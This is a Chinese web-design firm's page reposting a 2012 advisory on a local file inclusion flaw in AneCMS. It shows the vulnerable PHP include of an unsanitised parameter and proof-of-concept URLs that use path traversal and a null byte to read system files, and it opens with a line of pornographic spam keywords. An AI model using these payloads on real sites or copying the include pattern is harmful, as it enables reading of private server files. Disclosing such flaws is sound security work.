日韩av爽爽爽久久久久久,嫩草av久久伊人妇女超级a,久久精品a亚洲国产v高清不卡,久久成人国产精品一区二区

知識學堂
  • ·聯(lián)系電話:+86.023-75585550
  • ·聯(lián)系傳真:+86.023-75585550
  • ·24小時手機:13896886023
  • ·QQ 咨 詢:361652718 513960520
當前位置 > 首頁 > 知識學堂 > 網(wǎng)站建設(shè)知識
AneCMS v.2e2c583本地文件包含缺陷及修復
更新時間:2012-03-30 | 發(fā)布人:本站 | 點擊率:461
標題: AneCMS v.2e2c583 LFI exploit
作者Author: I2sec-PJH
軟件開發(fā)網(wǎng)站: https://github.com/AneGroup/AneCMS
影響版本: v.2e2c583
概述
source of index.php頁面存在缺陷
代碼分析如下
 
1. if(isset($_GET['p']))
2. include './pages/'.$_GET['p'].'.php';
3. else
4. include './pages/dash.php';
 
測試證明
http://www.badguest.cn /acp/index.php?p=../../../../windows/system.ini%00
http://www.badguest.cn /acp/index.php?p=../../../../[localfile]%00
 
提供修復:
過濾
相關(guān)文章